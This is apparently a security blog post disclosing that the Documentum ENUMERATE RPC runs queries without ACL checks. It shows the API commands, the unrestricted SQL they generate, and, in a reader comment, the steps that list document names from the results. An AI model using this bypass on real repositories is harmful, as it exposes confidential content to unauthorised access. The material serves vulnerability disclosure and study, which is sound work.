documentum security vulnerabilities: ENUMERATE RPC

Like RETURN_RANGE and ORACLE hints ENUMERATE RPC allows to run select queries without enforcing ACL restrictions:

API> apply,c,,ENUMERATE,OBJECT_TYPE,S,dm_sysobject,
       MATCH_TYPE,S,dm_document,
       ORDER_BY,S,r_creation_date,
       DESCENDING,B,T
...
q0
API> apply,c,,GET_LAST_SQL
...
q1
API> next,c,q1
...
OK
API> get,c,q1,result
...
SELECT * FROM DM_SYSOBJECT_RV dm_dbalias_B , DM_SYSOBJECT_SV dm_dbalias_C , 
DM_DOCUMENT_S dm_dbalias_D  WHERE (dm_dbalias_C.R_OBJECT_ID=dm_dbalias_D.R_OBJECT_ID 
AND dm_dbalias_C.R_OBJECT_ID=dm_dbalias_B.R_OBJECT_ID) 
ORDER BY dm_dbalias_C.R_CREATION_DATE DESC,
  dm_dbalias_B.R_OBJECT_ID,dm_dbalias_B.I_POSITION

2 thoughts on “documentum security vulnerabilities: ENUMERATE RPC

  1. And how can you use the results now? You only see that the SQL does not restrict to ACLs…

    Like

  2. “apply” command always returns a collection, so it’s required to iterate over collection to fetch results:

    API>apply,c,,ENUMERATE,OBJECT_TYPE,S,dm_sysobject,
    MATCH_TYPE,S,dm_document,
    ORDER_BY,S,r_creation_date,
    DESCENDING,B,F

    q5
    API> next,c,q5

    OK
    API> get,c,q5,object_name

    Default Signature Page Template
    API> next,c,q5

    OK
    API> get,c,q5,object_name

    CSEC Plugin
    API> next,c,q5

    OK
    API> get,c,q5,object_name

    Snaplock Connector

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s